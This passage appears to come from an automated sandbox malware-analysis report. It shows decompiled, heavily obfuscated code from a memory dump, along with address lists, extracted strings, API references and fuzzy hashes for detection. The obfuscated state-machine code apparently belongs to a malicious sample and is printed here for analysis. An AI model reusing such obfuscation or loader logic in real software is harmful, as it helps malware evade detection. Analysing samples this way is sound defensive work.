				_t415[0x13] = _t415[0x13] | 0x499231ac;
				_t415[0x13] = _t415[0x13] << 6;
				_t415[0x13] = _t415[0x13] ^ 0x7dd8fb23;
				_t415[0x22] = 0x533eec;
				_t415[0x22] = _t415[0x22] + 0xffff246b;
				_t415[0x22] = _t415[0x22] ^ 0x0053814d;
				_t415[6] = 0xb05f93;
				_t415[6] = _t415[6] ^ 0xf9d4ab47;
				_t415[6] = _t415[6] + 0xffff6279;
				_t415[6] = _t415[6] >> 8;
				_t415[6] = _t415[6] ^ 0x00fd3243;
				_t415[0x20] = 0xf7b530;
				_t415[0x20] = _t415[0x20] + 0xa986;
				_t415[0x20] = _t415[0x20] ^ 0x00f31461;
				_t415[0xb] = 0xc0c98a;
				_t415[0xb] = _t415[0xb] | 0xbc477ada;
				_t415[0xb] = _t415[0xb] ^ 0xd17e365f;
				_t415[0xb] = _t415[0xb] + 0xfbc8;
				_t415[0xb] = _t415[0xb] ^ 0x6db6a54b;
				_t415[0x11] = 0x3df948;
				_t415[0x11] = _t415[0x11] | 0x554c1cf4;
				_t415[0x11] = _t415[0x11] + 0xffff3939;
				_t415[0x11] = _t415[0x11] + 0x48bd;
				_t415[0x11] = _t415[0x11] ^ 0x557d8b89;
				_t415[0x17] = 0x443079;
				_t415[0x17] = _t415[0x17] << 6;
				_t415[0x17] = _t415[0x17] / _t405;
				_t415[0x17] = _t415[0x17] ^ 0x01083066;
				_t415[0x15] = 0x197a36;
				_t406 = 0x79;
				_t415[0x15] = _t415[0x15] / _t406;
				_t415[0x15] = _t415[0x15] | 0x00ca3701;
				_t415[0x15] = _t415[0x15] ^ 0x00cb182f;
				_t415[0x24] = 0x32bd0;
				_t407 = 0x6d;
				_t415[0x24] = _t415[0x24] * 0x68;
				_t415[0x24] = _t415[0x24] ^ 0x014cc366;
				_t415[8] = 0x233702;
				_t415[8] = _t415[8] / _t407;
				_t415[8] = _t415[8] + 0x77c9;
				_t415[8] = _t415[8] >> 0xb;
				_t415[8] = _t415[8] ^ 0x00057e5d;
				_t415[0xd] = 0x94260a;
				_t415[0xd] = _t415[0xd] ^ 0xf3ede0d3;
				_t408 = 0x42;
				_t415[0xc] = _t415[0xd] / _t408;
				_t415[0xc] = _t415[0xc] | 0xb02b0b60;
				_t415[0xc] = _t415[0xc] ^ 0xb3b4ff54;
				_t415[6] = 0x5dace2;
				_t415[6] = _t415[6] >> 6;
				_t415[6] = _t415[6] ^ 0x49279530;
				_t398 = _t415[0x1c];
				_t354 = _t415[0x1c];
				_t413 = _t415[0x1c];
				_t409 = _t415[0x1c];
				_t415[6] = _t415[6] * 0x58;
				_t415[6] = _t415[6] ^ 0x2550aeb3;
				_t415[0xe] = 0x734937;
				_t415[0xe] = _t415[0xe] >> 4;
				_t415[0xe] = _t415[0xe] * 0x46;
				_t415[0xe] = _t415[0xe] + 0xffffec0c;
				_t415[0xe] = _t415[0xe] ^ 0x01f29f0c;
				_t415[0x1e] = 0x9dde4a;
				_t415[0x1e] = _t415[0x1e] << 2;
				_t415[0x1e] = _t415[0x1e] ^ 0x027408c1;
				_t415[0x11] = 0x514540;
				_t415[0x11] = _t415[0x11] * 0x64;
				_t415[0x11] = _t415[0x11] >> 8;
				_t415[0x11] = _t415[0x11] * 0x12;
				_t415[0x11] = _t415[0x11] ^ 0x0230d1c1;
				while(1) {
					_t331 = 0x60477d;
					L2:
					while(_t356 != 0x588675) {
						if(_t356 == _t331) {
							_t337 = E01054D8D(_t354, _t415[0xf], _t415[0xd], _t409,  &(_t415[0x26]), _t398, _t415[0x24], _t356, _t415[0xd], _t356, _t356, _t415[0x10]);
							_t415 =  &(_t415[0xb]);
							__eflags = _t337;
							if(_t337 == 0) {
								_t338 = _t415[0x24];
							} else {
								_t411 = _t398;
								while(1) {
									__eflags =  *((intOrPtr*)(_t411 + 4)) - 4;
									if( *((intOrPtr*)(_t411 + 4)) != 4) {
										goto L17;
									}
									L16:
									_t341 = E010517CB(_t411 + 0xc, _t415[0x18], _t415[0x15], _t413);
									__eflags = _t341;
									if(_t341 == 0) {
										_t338 = 1;
										_t415[0x24] = 1;
									} else {
										goto L17;
									}
									L22:
									_t409 = _t415[0x1c];
									goto L23;
									L17:
									_t340 =  *_t411;
									__eflags = _t340;
									if(_t340 == 0) {
										_t338 = _t415[0x24];
									} else {
										_t411 = _t411 + _t340;
										__eflags =  *((intOrPtr*)(_t411 + 4)) - 4;
										if( *((intOrPtr*)(_t411 + 4)) != 4) {
											goto L17;
										}
									}
									goto L22;
								}
							}
							L23:
							__eflags = _t338;
							if(__eflags == 0) {
								_t331 = 0x60477d;
								_t356 = 0x60477d;
								continue;
							} else {
								E0105A2AB( *((intOrPtr*)( *0x106604c + 0x34)), _t415[7]);
								_t356 = 0xc6b09ff;
								while(1) {
									_t331 = 0x60477d;
									goto L2;
								}
							}
							L33:
						} else {
							if(_t356 == 0x19b0515) {
								_t409 = 0x1000;
								_push(_t356);
								_t415[0x1e] = 0x1000;
								_t398 = E0104F38A(0x1000);
								_t331 = 0x60477d;
								__eflags = _t398;
								_t356 =  !=  ? 0x60477d : 0x8867a89;
								continue;
							} else {
								if(_t356 == 0x7034cb8) {
									_t356 = 0x7eb64e3;
									continue;
								} else {
									if(_t356 == 0x7eb64e3) {
										E0105D617( &(_t415[0x27]), __eflags, _t415[0x1a], _t415[0x1d]);
										_t348 = E01053FAE( &(_t415[0x29]), _t415[0x1a], _t415[0x26], _t415[0x1e], _t415[0xa]);
										_t413 = _t348;
										_t415 =  &(_t415[5]);
										_t356 = 0x588675;
										 *((short*)(_t348 - 2)) = 0;
										while(1) {
											_t331 = 0x60477d;
											goto L2;
										}
									} else {
										if(_t356 == 0x8867a89) {
											E0105A566(_t415[0x1e], _t415[0x11], _t354);
										} else {
											if(_t356 != 0xc6b09ff) {
												L29:
												__eflags = _t356 - 0xd51710d;
												if(__eflags != 0) {
													continue;
												} else {
												}
											} else {
												E01042043(_t398, _t415[0xe], _t415[7], _t415[0xe]);
												_t356 = 0x8867a89;
												while(1) {
													_t331 = 0x60477d;
													goto L2;
												}
											}
										}
									}
								}
							}
						}
						L32:
						__eflags = 0;
						return 0;
						goto L33;
					}
					_push(_t356);
					_t335 = E0105199D(_t415[0x23],  &(_t415[0x2d]), _t415[0x17], _t415[0x27], _t415[0x13], 0x2000000, 1, _t415[0x1b] | 0x00000006, _t415[0xd], _t415[0xa]);
					_t354 = _t335;
					_t415 =  &(_t415[0xa]);
					__eflags = _t335 - 0xffffffff;
					if(__eflags == 0) {
						_t356 = 0xd51710d;
						_t331 = 0x60477d;
						goto L29;
					} else {
						_t356 = 0x19b0515;
						continue;
					}
					goto L32;
				}
			}

0x0104ec2d
0x0104ec36
0x0104ec3d
0x0104ec42
0x0104ec46
0x0104ec4d
0x0104ec54
0x0104ec5c
0x0104ec64
0x0104ec68
0x0104ec70
0x0104ec78
0x0104ec89
0x0104ec8d
0x0104ec95
0x0104ec9d
0x0104ecab
0x0104ecb0
0x0104ecb6
0x0104ecbe
0x0104ecc6
0x0104ecce
0x0104ecd3
0x0104ecdb
0x0104ece3
0x0104ece8
0x0104ecf0
0x0104ecf8
0x0104ed03
0x0104ed0b
0x0104ed16
0x0104ed1e
0x0104ed27
0x0104ed2c
0x0104ed32
0x0104ed3a
0x0104ed42
0x0104ed4a
0x0104ed56
0x0104ed59
0x0104ed63
0x0104ed67
0x0104ed6f
0x0104ed7e
0x0104ed7f
0x0104ed83
0x0104ed8b
0x0104ed93
0x0104ed9b
0x0104eda5
0x0104eda9
0x0104edb1
0x0104edb9
0x0104edc4
0x0104edcc
0x0104edd7
0x0104eddf
0x0104eded
0x0104edf1
0x0104edfb
0x0104ee03
0x0104ee1a
0x0104ee1d
0x0104ee21
0x0104ee29
0x0104ee31
0x0104ee39
0x0104ee41
0x0104ee49
0x0104ee51
0x0104ee59
0x0104ee5e
0x0104ee66
0x0104ee6e
0x0104ee76
0x0104ee7e
0x0104ee83
0x0104ee8b
0x0104ee96
0x0104eea1
0x0104eeac
0x0104eeb4
0x0104eebc
0x0104eec4
0x0104eec9
0x0104eed1
0x0104eedc
0x0104eee7
0x0104eef2
0x0104eefa
0x0104ef02
0x0104ef0a
0x0104ef12
0x0104ef1a
0x0104ef22
0x0104ef2a
0x0104ef32
0x0104ef3a
0x0104ef42
0x0104ef4a
0x0104ef57
0x0104ef5b
0x0104ef63
0x0104ef6f
0x0104ef74
0x0104ef7a
0x0104ef82
0x0104ef8a
0x0104ef9d
0x0104efa0
0x0104efa7
0x0104efb2
0x0104efc2
0x0104efc6
0x0104efce
0x0104efd3
0x0104efdb
0x0104efe3
0x0104efef
0x0104eff2
0x0104eff6
0x0104effe
0x0104f006
0x0104f00e
0x0104f013
0x0104f020
0x0104f024
0x0104f028
0x0104f02c
0x0104f030
0x0104f034
0x0104f03c
0x0104f044
0x0104f04e
0x0104f052
0x0104f05a
0x0104f062
0x0104f06a
0x0104f06f
0x0104f077
0x0104f084
0x0104f088
0x0104f092
0x0104f096
0x0104f09e
0x0104f09e
0x00000000
0x0104f0a3
0x0104f0b1
0x0104f1be
0x0104f1c3
0x0104f1c6
0x0104f1c8
0x0104f1ff
0x0104f1ca
0x0104f1ca
0x0104f1cc
0x0104f1cc
0x0104f1d0
0x00000000
0x00000000
0x0104f1d2
0x0104f1de
0x0104f1e5
0x0104f1e7
0x0104f1f5
0x0104f1f6
0x00000000
0x00000000
0x00000000
0x0104f20f
0x0104f20f
0x00000000
0x0104f1e9
0x0104f1e9
0x0104f1eb
0x0104f1ed
0x0104f208
0x0104f1ef
0x0104f1ef
0x0104f1cc
0x0104f1d0
0x00000000
0x00000000
0x0104f1d0
0x00000000
0x0104f1ed
0x0104f1cc
0x0104f213
0x0104f213
0x0104f215
0x0104f23b
0x0104f240
0x00000000
0x0104f217
0x0104f22b
0x0104f231
0x0104f09e
0x0104f09e
0x00000000
0x0104f09e
0x0104f09e
0x00000000
0x0104f0b7
0x0104f0bd
0x0104f161
0x0104f16e
0x0104f170
0x0104f17a
0x0104f17c
0x0104f182
0x0104f189
0x00000000
0x0104f0c3
0x0104f0c9
0x0104f153
0x00000000
0x0104f0cf
0x0104f0d5
0x0104f11a
0x0104f139
0x0104f13e
0x0104f140
0x0104f145
0x0104f14a
0x0104f09e
0x0104f09e
0x00000000
0x0104f09e
0x0104f0d7
0x0104f0dd
0x0104f2b7
0x0104f0e3
0x0104f0e9
0x0104f2a0
0x0104f2a0
0x0104f2a6
0x00000000
0x00000000
0x0104f2ac
0x0104f0ef
0x0104f0fd
0x0104f104
0x0104f09e
0x0104f09e
0x00000000
0x0104f09e
0x0104f09e
0x0104f0e9
0x0104f0dd
0x0104f0d5
0x0104f0c9
0x0104f0bd
0x0104f2bd
0x0104f2c0
0x0104f2c9
0x00000000
0x0104f2c9
0x0104f247
0x0104f27d
0x0104f282
0x0104f284
0x0104f287
0x0104f28a
0x0104f296
0x0104f29b
0x00000000
0x0104f28c
0x0104f28c
0x00000000
0x0104f28c
0x00000000
0x0104f28a

Strings

!kP, xrefs: 0104ECF8
qQ, xrefs: 0104F2A0
}G`, xrefs: 0104F29B
}G`, xrefs: 0104F17C
qQ, xrefs: 0104F296
>S, xrefs: 0104EE8B
}G`, xrefs: 0104F23B
LMe, xrefs: 0104EE6E
{2, xrefs: 0104EE21
}G`, xrefs: 0104F09E
@EQ, xrefs: 0104F077
7Is, xrefs: 0104F03C
y0D, xrefs: 0104EF42
0d, xrefs: 0104EC8D

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID: lstrcmpi
String ID: qQ$qQ$!kP$0d$7Is$@EQ$LMe$y0D${2$}G`$}G`$}G`$}G`$>S
API String ID: 1586166983-321775154
Opcode ID: 1a1e3224ae79bdfeade0dc473e5d3f0e063827951fe27196c9c3cb04f55f66e7
Instruction ID: 5202279ca39bf78f27932534eb238abd4a7c8e3d708b54d7da6f7d1b5e0f01ab
Opcode Fuzzy Hash: 1a1e3224ae79bdfeade0dc473e5d3f0e063827951fe27196c9c3cb04f55f66e7
Instruction Fuzzy Hash: 1BF152B15083819FD3A8CF29C58964BFBE1FBC4758F10891DF6DA86260D7B58949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 01051F6B, Relevance: 16.9, Strings: 13, Instructions: 604COMMON

Download Yara Rule

Strings

(., xrefs: 0105225D
;>-, xrefs: 0105287F
2Y, xrefs: 010526C7
1{R, xrefs: 01052693
s, xrefs: 01052545
~1, xrefs: 010524E8
[ao, xrefs: 0105202B
O;0, xrefs: 01052931
c, xrefs: 01052854
B=&, xrefs: 010527B1
)c', xrefs: 0105286F
t-!, xrefs: 01051FCB
[S+, xrefs: 010522C9

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: s$)c'$1{R$2Y$;>-$B=&$O;0$[ao$[S+$c$t-!$~1$(.
API String ID: 0-3687093388
Opcode ID: 03dc23d6de70c0a0d75908f1830660e2b7817478296806d1e65df22e0e1a9f85
Instruction ID: a352f5f4169b75fec6b085e6f620b66b43d3f0602314f6a43565772dead50c76
Opcode Fuzzy Hash: 03dc23d6de70c0a0d75908f1830660e2b7817478296806d1e65df22e0e1a9f85
Instruction Fuzzy Hash: 4B72F071509381CBD3B8CF24C58AB9BBBE1BBD4304F108A1DE6DA96260D7B19949CF53

Uniqueness

Uniqueness Score: -1.00%

Function 0105BFE8, Relevance: 14.2, Strings: 11, Instructions: 420COMMON

Download Yara Rule

Strings

+b, xrefs: 0105C70D
@cK, xrefs: 0105C68B
(Z, xrefs: 0105C441
I!K, xrefs: 0105C62B
+b, xrefs: 0105C82B
Kn?, xrefs: 0105C272
1#[, xrefs: 0105C2BE
{/, xrefs: 0105C5C2
FV, xrefs: 0105C34B
N#/y, xrefs: 0105C03D
"k, xrefs: 0105C4F7

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: +b$ +b$"k$(Z$1#[$@cK$FV$I!K$Kn?$N#/y${/
API String ID: 0-1219850661
Opcode ID: f589f398c794c224ad4d805f70bab3df65c189abdecad0c8a94c1c6ee581f79b
Instruction ID: 69cb71cbbe5e6561e1b653f95e13aedcae3647a55f45f97d20e63dc8a414c9ce
Opcode Fuzzy Hash: f589f398c794c224ad4d805f70bab3df65c189abdecad0c8a94c1c6ee581f79b
Instruction Fuzzy Hash: 253224711093819FE3A8CF24C98AA9BFBE1FBD4758F10891DE5C996260D7B59948CF03

Uniqueness

Uniqueness Score: -1.00%

Function 0104D223, Relevance: 14.1, Strings: 11, Instructions: 367COMMON

Download Yara Rule

Strings

@`, xrefs: 0104D719
"E, xrefs: 0104D407
lMr, xrefs: 0104D2B5
8, xrefs: 0104D2AD
VX, xrefs: 0104D443
_;Y, xrefs: 0104D378
lQm, xrefs: 0104D5A2
a$c, xrefs: 0104D6C4
`qJ7, xrefs: 0104D5DC
, xrefs: 0104D8C7
@`, xrefs: 0104D8E3

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: $"E$@`$@`$_;Y$`qJ7$a$c$lMr$lQm$VX$8
API String ID: 0-1043295566
Opcode ID: 816dba574116be04c69ae3083619c3268acc96dc46c510461b1f3c3ca6c586f7
Instruction ID: 1a089e61298372b3a0f14272d55678f26f0284e0efce9b41ce7fcd5adca3879a
Opcode Fuzzy Hash: 816dba574116be04c69ae3083619c3268acc96dc46c510461b1f3c3ca6c586f7
Instruction Fuzzy Hash: 4D1231B11083818FD368CF64C589A9FFBE1FBD4748F108A1DE6DA96260D7B19948CF42

Uniqueness

Uniqueness Score: -1.00%

Function 0106292B, Relevance: 14.0, Strings: 11, Instructions: 257COMMON

Download Yara Rule

Strings

-Op, xrefs: 01062BDE
0s=, xrefs: 01062D8D
BZ$, xrefs: 010629DD
> , xrefs: 01062A5A
;, xrefs: 01062AD8
Ia, xrefs: 01062A23
0s=, xrefs: 01062D14
%-?, xrefs: 01062CB7
8{5, xrefs: 01062A40
5A, xrefs: 01062BBD
"IA, xrefs: 01062C86

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: "IA$%-?$-Op$0s=$0s=$5A$8{5$> $BZ$$Ia$;
API String ID: 0-1228380503
Opcode ID: a73bc57a512c9dca50d9cd8a2c87a1b09fc40f045780e8424cd384f047573c5f
Instruction ID: 1a5a3a1fa6f1dd23f24ea312e3038f65d14bb3ba9215a99f315e16fe755114ad
Opcode Fuzzy Hash: a73bc57a512c9dca50d9cd8a2c87a1b09fc40f045780e8424cd384f047573c5f
Instruction Fuzzy Hash: 79D12FB14083819FC7A8CF65C98A95BBBF5FBC4758F508A1DF2D686260D7B18948CF42

Uniqueness

Uniqueness Score: -1.00%

Function 0105B397, Relevance: 12.8, Strings: 10, Instructions: 321COMMON

Download Yara Rule

Strings

/, xrefs: 0105B894
U, xrefs: 0105B435
[,#, xrefs: 0105B51B
,:6, xrefs: 0105B7CF
vC3, xrefs: 0105B5BD
zo, xrefs: 0105B479
v?, xrefs: 0105B5EB
o*, xrefs: 0105B778
N3?, xrefs: 0105B90C
_L, xrefs: 0105B8B9

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: /$,:6$N3?$[,#$_L$o*$vC3$zo$v?$U
API String ID: 0-2508983956
Opcode ID: 1badaac10d468f9df8b59aba3bf2defd6ea92ad920553d06a53bf9ba0641ca3c
Instruction ID: c7ffca266abe84dea71f7896808f409f4c272c3c55662415fbce5e28d29f0d60
Opcode Fuzzy Hash: 1badaac10d468f9df8b59aba3bf2defd6ea92ad920553d06a53bf9ba0641ca3c
Instruction Fuzzy Hash: 0902E3B15083819FE3A5CF21C48AA9BFBE1FBC5358F108A1DE5D986220D7B49949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 010544AA, Relevance: 12.8, Strings: 10, Instructions: 316COMMON

Download Yara Rule

Strings

^rnd, xrefs: 01054802
sr{, xrefs: 01054930
>z, xrefs: 010547BD
O, xrefs: 010546F9
-u, xrefs: 010549DB
SJT, xrefs: 01054640
mF2, xrefs: 010546D7
[X@, xrefs: 01054871
nY, xrefs: 010546DF
rw, xrefs: 01054965

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: mF2$-u$>z$O$SJT$[X@$^rnd$nY$rw$sr{
API String ID: 0-1390466442
Opcode ID: 0949f620fd739bee421b1308be335f0a5db9c6332b5f2f1e11a950fa21634acf
Instruction ID: 7fa15a5b3c21d7b091c583dba3abd2b78c22bea5b42e391341a1116f8a33bccb
Opcode Fuzzy Hash: 0949f620fd739bee421b1308be335f0a5db9c6332b5f2f1e11a950fa21634acf
Instruction Fuzzy Hash: 81F11D725093809FD3A9CF65C58AA5BFBE1BBC4748F508A0DF2D986260D7B18949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 01048C09, Relevance: 11.6, Strings: 9, Instructions: 322COMMON

Download Yara Rule

Strings

y&, xrefs: 01048E12
09, xrefs: 0104917C
z], xrefs: 01048D3A
4y&, xrefs: 01048D84
yM", xrefs: 01048D1D
O|L, xrefs: 01048CC7
$^;, xrefs: 01048F21
>@, xrefs: 01049169
y&, xrefs: 01048DFB

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: $^;$09$4y&$>@$O|L$y&$y&$yM"$z]
API String ID: 0-2859082777
Opcode ID: 1a57fb3f09506dd7d590dba4aecb5b85bf9241df0278e8e34c0d067b13c9724f
Instruction ID: a6b7073d74cbb2cdc2fc9651e75f8373855250b158cf834d0603ae0cd35b22e4
Opcode Fuzzy Hash: 1a57fb3f09506dd7d590dba4aecb5b85bf9241df0278e8e34c0d067b13c9724f
Instruction Fuzzy Hash: 090200B14083819FD3A9CF21C58AA8FFBE1BBD4758F108A1DE1D986260D7B18949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 6E9BEBD0, Relevance: 10.7, APIs: 7, Instructions: 162libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000060), ref: 6E9BEC5D
LoadLibraryExW.KERNEL32(?,00000000,00000002), ref: 6E9BEC6F
FindResourceW.KERNEL32(00000000,?,?), ref: 6E9BEC96
LoadResource.KERNEL32(00000000,00000000), ref: 6E9BECAE

Part of subcall function 6E9BE270: GetLastError.KERNEL32(6E9BED79), ref: 6E9BE270

FreeLibrary.KERNEL32(00000000,00000000,?), ref: 6E9BED9F

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$Resource$ErrorFindFreeLast
String ID:
API String ID: 328770362-0
Opcode ID: 5747d9b340947d36fe613bbef0e927c6eb87f01abc7ca9a30dd214eac0d2ba39
Instruction ID: cc5d55ccd1da673690b6fd63bf4d8c0fc7b0cef766e78712dd0953707ef75266
Opcode Fuzzy Hash: 5747d9b340947d36fe613bbef0e927c6eb87f01abc7ca9a30dd214eac0d2ba39
Instruction Fuzzy Hash: 0A51CDB1A0071DAFDB20CB94CC44B9EB7BCEF89714F5005A9EA09A7240DB70EA448F59

Uniqueness

Uniqueness Score: -1.00%

Function 0104F41F, Relevance: 10.3, Strings: 8, Instructions: 333COMMON

Download Yara Rule

Strings

_, xrefs: 0104F7A0
<ix, xrefs: 0104F5D7
E3, xrefs: 0104F6F4
g,, xrefs: 0104F496
c, xrefs: 0104F72A
WL, xrefs: 0104F51F
)h?;, xrefs: 0104F471
G8n, xrefs: 0104F49E

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: )h?;$<ix$E3$G8n$WL$c$g,$_
API String ID: 0-720653590
Opcode ID: c8c8f25b5ec8e67c0d390343d6d774783f3df94c01f0a81c5ee0a0eb43d75daa
Instruction ID: e6b943514d684a9457afe2d57969d45ef903f9e86f4fe308c7f0c90c4115a8e9
Opcode Fuzzy Hash: c8c8f25b5ec8e67c0d390343d6d774783f3df94c01f0a81c5ee0a0eb43d75daa
Instruction Fuzzy Hash: 13F110B14093819FE3A4CF65C486A8BFBE5BBC4748F00891DF1D996260D7B59909CF53

Uniqueness

Uniqueness Score: -1.00%

Function 0104FEA0, Relevance: 10.2, Strings: 8, Instructions: 250COMMON

Download Yara Rule

Strings

X{, xrefs: 0104FFB9
vd;, xrefs: 0104FF5B
%Y, xrefs: 0104FED0
JU, xrefs: 01050097
*s, xrefs: 010500D4
L, xrefs: 0104FF2E
_g, xrefs: 010500B4
BwO, xrefs: 01050011

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: %Y$*s$BwO$JU$X{$vd;$_g$L
API String ID: 0-2451716437
Opcode ID: 20dec532de0d59611c99abc7275eaeb367f4b71883c0421be60b5a64edd8b769
Instruction ID: 356dbbfc86c7d1260457982828825da8ce8d3212c93bb0713f28d74d00735ad0
Opcode Fuzzy Hash: 20dec532de0d59611c99abc7275eaeb367f4b71883c0421be60b5a64edd8b769
Instruction Fuzzy Hash: FEC11E724083819FC7A8CF65C88991BFBF1FB84794F508A1DF6D686260C3B28949CF46

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E3074, Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1400COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 6E9E31E6

Strings

1#IND, xrefs: 6E9E440A
1#SNAN, xrefs: 6E9E4411
1#QNAN, xrefs: 6E9E4418
1#INF, xrefs: 6E9E441F

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: e6febc66463fd1972d02bf4b1205d8a3e3899d2ca5e987fc81d0b2621599582d
Instruction ID: f764292fdbde3988f4e1acded78aba46ebad802ca2358bc42e7df5fc9c7e0b7c
Opcode Fuzzy Hash: e6febc66463fd1972d02bf4b1205d8a3e3899d2ca5e987fc81d0b2621599582d
Instruction Fuzzy Hash: 57C25971E086298FDB66CE68CD447E9B3B9EF89304F1045EAD94DA7640E774EE818F40

Uniqueness

Uniqueness Score: -1.00%

Function 0104C5FE, Relevance: 9.1, Strings: 7, Instructions: 374COMMON

Download Yara Rule

Strings

`3", xrefs: 0104C732
kA^, xrefs: 0104CA71
x8H, xrefs: 0104C825
^\], xrefs: 0104C662
dk;, xrefs: 0104C6EE
kA^, xrefs: 0104CAF9
hKp, xrefs: 0104C82F

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: ^\]$`3"$dk;$hKp$kA^$kA^$x8H
API String ID: 0-1464862232
Opcode ID: 82a181e44f704e7027110186354239578216e72a598376ea6904178fd0d840a1
Instruction ID: 1ef0a48b3eaeb06214168dbad954c61f60ba06d31c2defadb651103c959c264a
Opcode Fuzzy Hash: 82a181e44f704e7027110186354239578216e72a598376ea6904178fd0d840a1
Instruction Fuzzy Hash: 050234B1D0131DDBDF68CFA5D989ADEBBB1FB04314F2081A9D516BA260D7B40A45CF80

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C849D, Relevance: 9.0, APIs: 6, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000C,6E9C83B9,00000000,?,6E9C8550,00000000), ref: 6E9C849F
GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,0000000C,6E9C83B9,00000000,?,6E9C8550,00000000), ref: 6E9C84C5
HeapAlloc.KERNEL32(00000000), ref: 6E9C84CC
InitializeSListHead.KERNEL32(00000000), ref: 6E9C84D9
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6E9C84EE
HeapFree.KERNEL32(00000000), ref: 6E9C84F5

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
String ID:
API String ID: 1475849761-0
Opcode ID: bd8b0ddd3b97855ec0b4d7f134563897299a84c75489cb86047d1fe0bd8ef0f2
Instruction ID: a3cc3f9bef283ab817ee64c3afa3d15c9882399ff2c3f9d191eb9850f98c4bf3
Opcode Fuzzy Hash: bd8b0ddd3b97855ec0b4d7f134563897299a84c75489cb86047d1fe0bd8ef0f2
Instruction Fuzzy Hash: 0FF06271214B02ABDB65AFB88C18B1636BCBF86B26F00442CEA49D7344FF30D4018A62

Uniqueness

Uniqueness Score: -1.00%

Function 0105ECE3, Relevance: 8.9, Strings: 7, Instructions: 195COMMON

Download Yara Rule

Strings

, xrefs: 0105EE13
WA|, xrefs: 0105EE28
mU6, xrefs: 0105ED5D
30, xrefs: 0105EF1F
LX, xrefs: 0105EE81
oZ, xrefs: 0105EE51
"il, xrefs: 0105EEE0

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: $"il$30$LX$WA|$mU6$oZ
API String ID: 0-1531084893
Opcode ID: 91f9c8f2284525cf01490cf23f956b086f2dc8d893345e47fbea2531c7bdbc3f
Instruction ID: 01d9bee7de1108bcddef3a69db34c4f1d6d179fb75edc8ea1881b38f5b0d039b
Opcode Fuzzy Hash: 91f9c8f2284525cf01490cf23f956b086f2dc8d893345e47fbea2531c7bdbc3f
Instruction Fuzzy Hash: E59153728083419FD798CF29C58941BFBF1BBC4358F145A1DF9E9A6260D3B19A498F83

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E5F10, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,6E9E622F,?,00000000), ref: 6E9E5FA9
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,6E9E622F,?,00000000), ref: 6E9E5FD2
